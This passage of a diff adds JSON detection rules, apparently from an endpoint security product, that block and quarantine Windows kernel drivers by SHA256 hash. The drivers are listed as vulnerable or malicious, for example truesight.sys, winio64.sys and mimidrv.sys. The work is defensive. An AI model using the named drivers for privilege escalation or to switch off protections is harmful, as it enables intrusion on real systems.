+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9c251594-9097-508f-860e-851f557c1231",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979082Z",
+ "creation_date": "2026-03-23T11:45:29.979084Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979089Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "23ba19352b1e71a965260bf4d5120f0200709ee8657ed381043bec9a938a1ade",
+ "comment": "Vulnerable Kernel Driver (aka LHA.sys) [https://www.loldrivers.io/drivers/eb07ef7e-0402-48eb-8e06-8fb76eda5b84/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9c3375b7-0084-5b14-8688-43c77eda146d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143910Z",
+ "creation_date": "2026-03-23T11:45:31.143912Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143917Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a6611470131d2bf9f571217bc83ab77e4e8cfa6cd08c6b4b6994a9b045d0a93d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9c383a0c-a508-50c9-81e6-2ff68fdd2fb5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463270Z",
+ "creation_date": "2026-03-23T11:45:30.463273Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463282Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec96b15ce218f97ec1d8f07f13b052d274c4c8438f31daf246ccfaaee5e1bebd",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9c395aa1-3474-5231-b2cd-5db1377a70e4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832279Z",
+ "creation_date": "2026-03-23T11:45:30.832281Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832287Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e7e0b9ee449be3f6af44d4bc962e5b8e7bcd2fc657796c257a6234920c68ab27",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9c3e97d9-1dce-577b-82e5-2090f5c0c7b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150479Z",
+ "creation_date": "2026-03-23T11:45:31.150480Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150486Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "381463e3020706e124291c7a6d0df2fbee49e2f695fb8dc027d4ebb03f30134b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9c3ead8f-2cac-5be6-85e3-3c5667f1add9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143077Z",
+ "creation_date": "2026-03-23T11:45:31.143079Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143085Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e7ed5283aa462d89ca12960b6fccad1d86cd3b9bcda9b9e532f937f634950a43",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9c5e7a68-a056-517f-bc63-f8d6189e85c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156345Z",
+ "creation_date": "2026-03-23T11:45:31.156347Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156352Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f4fe055699c47493921717525e1939c3b4426c65efd1f2e922eefff5c1d3ac20",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9c6d76dc-d377-54bd-8936-126268ea8465",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488776Z",
+ "creation_date": "2026-03-23T11:45:31.488778Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488784Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b84b2161ca1515e4d503a1ddd8fed1c995e2f4f45ece1f5504059ecf7ea5360",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9c841118-5e96-53b8-8556-66bb845ce94e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459547Z",
+ "creation_date": "2026-03-23T11:45:30.459551Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459571Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e94e8a87459db56837d1c58f9854794aa99f36566a9ded9b398be9d4d3a2c2af",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9c88dbcd-516e-5c3f-9310-905534e65e98",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984804Z",
+ "creation_date": "2026-03-23T11:45:29.984806Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984811Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "913ab7134ea3460e76db753cf68f336ada8f0b9c397be88c75f9567a8694f4a5",
+ "comment": "Dangerous Physmem Kernel Driver (aka AsrRapidStartDrv.Sys) [https://www.loldrivers.io/drivers/19d16518-4aee-4983-ba89-dbbe0fa8a3e7/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9c97c4a0-6717-589d-9ada-2d68e24d8f46",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813740Z",
+ "creation_date": "2026-03-23T11:45:31.813742Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813747Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e32f82241a529082fe33a4bfbd949a50c8ef947f4742cfa4027143afc051784",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9c980820-ef5c-501f-a236-e148171aacd6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972721Z",
+ "creation_date": "2026-03-23T11:45:29.972723Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972728Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "04f771d72a812fe9dd6bced402b36b081c80bd3397fdd66dbaa44906ac088159",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9c9ea072-21ec-55e5-91ed-f144f03f80ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819175Z",
+ "creation_date": "2026-03-23T11:45:30.819177Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819182Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "713c7a6532cbc952546c3b844ed529b5b285dc29e16036731ceebc6f6431ae77",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9ca1b18b-60a6-5db1-af13-b6c5168b4e9a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155649Z",
+ "creation_date": "2026-03-23T11:45:31.155651Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155657Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b31d89fa12755b4b91cadf4106aa617155a8ee6feac355ab40bf4fe54b4df3e1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9ca41e79-03b3-5654-9813-68078c4775a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982361Z",
+ "creation_date": "2026-03-23T11:45:29.982363Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982368Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dbe9f17313e1164f06401234b875fbc7f71d41dc7271de643865af1358841fef",
+ "comment": "Vulnerable Kernel Driver (aka winio64.sys) [https://www.loldrivers.io/drivers/1ff757df-9a40-4f78-a28a-64830440abf7/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9cb60c53-cc25-5eb3-a624-d22b97780a5e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458992Z",
+ "creation_date": "2026-03-23T11:45:30.458995Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459005Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0eace788e09c8d3f793a1fad94d35bcfd233f0777873412cd0c8172865562eec",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9cb8639e-04d2-52d1-a72a-3a4f69960fcb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616605Z",
+ "creation_date": "2026-03-23T11:45:29.616607Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616612Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e7cbfb16261de1c7f009431d374d90e9eb049ba78246e38bc4c8b9e06f324b6f",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9cc171a0-314f-53a6-9bb6-cdc71b7cb3d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818772Z",
+ "creation_date": "2026-03-23T11:45:30.818774Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818779Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9fa699246d83356d7b4bd99adf3c74f8e0682a650de2687075e70418ee9d5e38",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9cd4d84b-7a24-5985-a128-13cc8ed06361",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142128Z",
+ "creation_date": "2026-03-23T11:45:31.142130Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142136Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e507406311a9ca0620cae70209d97725fb22fdfb4e94b941284fdf5c1e310ba6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9cd914a6-e239-5a25-b2bd-4631f88e0eab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145523Z",
+ "creation_date": "2026-03-23T11:45:31.145525Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145531Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f1c1a28aac308366f9679c2d730e6e93e9f1344c5961242f99f7129f29e50d9d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9ce8fc0c-8b80-557c-a4c7-312d4701a69e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612351Z",
+ "creation_date": "2026-03-23T11:45:29.612352Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612358Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0da746e49fd662be910d0e366934a7e02898714eaaa577e261ab40eb44222b5c",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9ced9727-4ce2-5198-817f-4b520b5109d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979047Z",
+ "creation_date": "2026-03-23T11:45:29.979049Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979054Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d8f7ddf5de213c6dc0356dc83b6307ec596e66c33c3cdd826a612c12004ba9dc",
+ "comment": "Vulnerable Kernel Driver (aka driver7-x64.sys) [https://www.loldrivers.io/drivers/48bc2815-85ec-4436-a51a-69810c8cb171/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9cefeb14-f96d-5260-8867-d1678c10fb61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
